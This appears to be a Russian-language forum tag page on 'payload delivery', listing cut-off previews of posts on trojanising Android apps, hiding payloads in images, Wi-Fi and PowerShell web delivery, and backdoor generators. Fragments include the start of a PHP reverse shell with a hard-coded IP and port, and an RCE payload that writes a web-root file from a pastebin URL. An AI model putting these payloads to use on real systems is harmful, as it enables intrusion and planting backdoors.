payload delivery

Можно использовать легитимное приложение Android в качестве трояна, чтобы использовать фактическое устройство пользователя. Причины того, почему этот тест важен при каждой оценке безопасности Android, заключается в том, что он позволит тестеру определить, существуют ли определенные защиты вокруг...

Большинству приложений Android не хватает достаточной защиты вокруг двоичного файла, и поэтому злоумышленник может легко троянизировать легитимное приложение с вредоносными нагрузками. Это одна из причин того, что мобильное вредоносное ПО так быстро распространяется в телефонах Android. При...

Прохожу интересный CTF и там возможность подгрузить только jpg, проверка на jpg судя по всему идет на сервере, т.к. попытки подмены понятий через burp не проходят. Создал через FatRat стандартную php нагрузку /*<?php /**/ error_reporting(0); $ip = '192.168.168.168'; $port = 6969; if (($f =...

Привет привет codeby, сегодня я расскажу вам про то как спрятать payload в картинке. Меня кстати Ghost Pants зовут. Данная статья является переводом с изменением данной статьи Peerlyst Приступаем: Это картинка, обычная совсем не подозрительная картинка. А если приблизить? Мы видим наш...

Привет любимый codeby, с вами Ghost Pants и сегодня мы поговорим о загрузке пейлоада через wi-fi. Данная статья является переводом с внесением корректив вот этой статьи Peerlyst. Итак, у нас есть backdoor payload не шифрованный и без всяких прочих приблуд способных защитить нас от обнаружения...

Привет народ!! это часть эксплойта ,где пайлд! подскаите чем сгенерировать мне свой пайлод? и как правильно все указать? def generate(payload): php_payload = "eval({0})".format(toCharCode(payload)) terminate = '\xf0\xfd\xfd\xfd'; exploit_template =...

Привет возник такой в эксплойтах типа RCE используют пайлоды , вот пример создания страницы пхп с Hacked by pl = generate_payload("fwrite(fopen($_SERVER['DOCUMENT_ROOT'].'/Mah.php','w+'),file_get_contents('http://pastebin.com/raw/pYetDreV'))...

Привет, предлагаю обратить ваше внимание, на очередной, достаточно свежий инструмент, для создания полезных нагрузок, и дальнейшей эксплуатации ее, в качестве Remote Administration Tool. Zero Door Backdoor Generator. Установка: > git clone https://github.com/Souhardya/Zerodoor > cd...

Часть 4 Предыдущая часть Следующая часть Все части Сегодня подготовительная статья на тему возможности PowerShell с точки зрение ИБ, на которою я еще буду ссылаться в дальнейших постах. Речь пойдет сегодня от технике Web Delivery - Доставка Полезной нагрузки через Web. Как вы заметили , я...